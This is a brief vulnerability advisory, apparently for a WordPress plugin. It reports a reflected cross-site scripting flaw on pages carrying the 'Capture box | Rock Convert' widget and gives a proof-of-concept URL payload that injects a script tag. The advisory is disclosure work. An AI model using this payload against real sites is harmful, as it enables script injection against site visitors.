The plugin does not sanitise and escape an URL before outputting it back in an attribute when a specific widget is present on a page, leading to a Reflected Cross-Site Scripting
On a page where the "Capture box | Rock Convert" widget is present, append ?"><script>alert(/XSS/)</script>, e.g: https://example.com/?"><script>alert(/XSS/)</script>